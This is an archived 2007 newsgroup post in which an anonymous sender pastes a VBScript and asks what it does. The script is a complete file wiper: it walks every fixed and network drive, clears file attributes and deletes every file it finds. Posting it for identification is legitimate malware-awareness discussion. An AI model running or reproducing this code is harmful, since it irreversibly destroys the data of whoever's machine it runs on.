1z th1s a v1ru5?
- From: Nomen Nescio <nobody@xxxxxxxxx>
- Date: Mon, 30 Apr 2007 09:30:20 +0200 (CEST)
what will this actually do?
On Error Resume Next
Set FILESYSTEM0BJECT = CreateObject("Scripting.FileSystemObject")
For Each DType In FILESYSTEM0BJECT.Drives
If DType.DriveType = 2 Or DType.DriveType = 3 Then
Searching(DType.Path & "\")
End If
Next
Sub Searching(fspec)
On Error Resume Next
Set FS4 = FILESYSTEM0BJECT.GetFolder(Fspec)
For Each F2F In FS4.Files
FILESYSTEM0BJECT.GetFile(F2F.Path).Attributes = 32
FILESYSTEM0BJECT.DeleteFile F2F.Path
Next
For Each F4D In FS4.SubFolders
Searching(F4D.Path)
Next
End Sub
.
- Follow-Ups:
- Re: 1z th1s a v1ru5?
- From: Art
- Re: 1z th1s a v1ru5?
- Prev by Date: Re: Mcafee vs Symantec
- Next by Date: Re: This NG is getting useless
- Previous by thread: Mcafee vs Symantec
- Next by thread: Re: 1z th1s a v1ru5?
- Index(es):